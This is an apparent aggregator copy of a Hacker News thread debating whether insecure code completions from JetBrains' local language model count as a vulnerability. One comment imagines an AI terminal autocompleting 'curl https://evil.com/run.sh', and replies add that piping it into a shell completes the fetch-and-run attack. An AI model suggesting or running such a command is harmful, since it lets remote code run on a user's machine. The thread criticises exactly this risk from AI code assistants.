TechPulseTechPulse
Back to News
Advertisement
Advertisement

⚡ Community Insights

Discussion Sentiment

25% Positive

Analyzed from 253 words in the discussion.

Trending Topics

#vulnerability#curl#llm#code#ones#completions#least#local#using#https

Discussion (10 Comments)Read Original on HackerNews

mgc811 minutes ago
Maybe not a vulnerability per se, but definitely conducing to ones, as others have noted. However, those completions are quite unfortunate to say the least, thus one would hope JetBrains would endeavour to improve the local (S)LM they're using, or at least offer the user the option to use one of their own, better tuned ones instead?
sph21 minutes ago
Waiting for the first terminal with AI autocompletion.

  $ curl http<tab>

  $ curl https://evil.com/run.sh
Then you’re just an enter away from causing havoc on your system.
mgc814 minutes ago
Well, technically it's not the curl itself that is the problem, but the "| <shell>" coming afterwards that does the damage. So, if the process is somehow broken up into 1) curl <the_script>; 2) analyse <the_script> and 3) only if safe, then execute <the_script> -- then it's not nearly as bad. Of course, that "analyse" step does all the heavy lifting, and if it happens to involve some form of local LLM then... excitement is guaranteed as they say.
chmod77517 minutes ago
Still missing the pipe into sh.
sph9 minutes ago
Ah too late to edit. That is what I meant
chmod77518 minutes ago
It's only a vulnerability if you absolve humans of responsibility and demote them to "meatbag vehicle for checking in LLM code".
stephantulabout 1 hour ago
It’s an interesting question: I’d say this is more of a vulnerability creator than the actual vulnerability.

Similar to how using very difficult technologies makes you more likely to create code with vulnerabilities: the technologies are not the vulnerability, but it’s easier to cause them.

marcosdumayabout 2 hours ago
Well, the plugin developers can't really do anything about it.

And it's the one thing the LLM developers have been trying to fix for the last 2 years. Apparently, even at the cost of some other functionality. It's not like they can do it reliably.

frumplestlatz32 minutes ago
What is “monster-in-the-middle” and why is it being used in place of (presumably) “man-in-the-middle”?
runningmike44 minutes ago
“ Are insecure code completions a vulnerability?” No it might be a potential security weakness. Semantics matters.

See also: https://nocomplexity.github.io/pythonsecurity/fundamentals/w...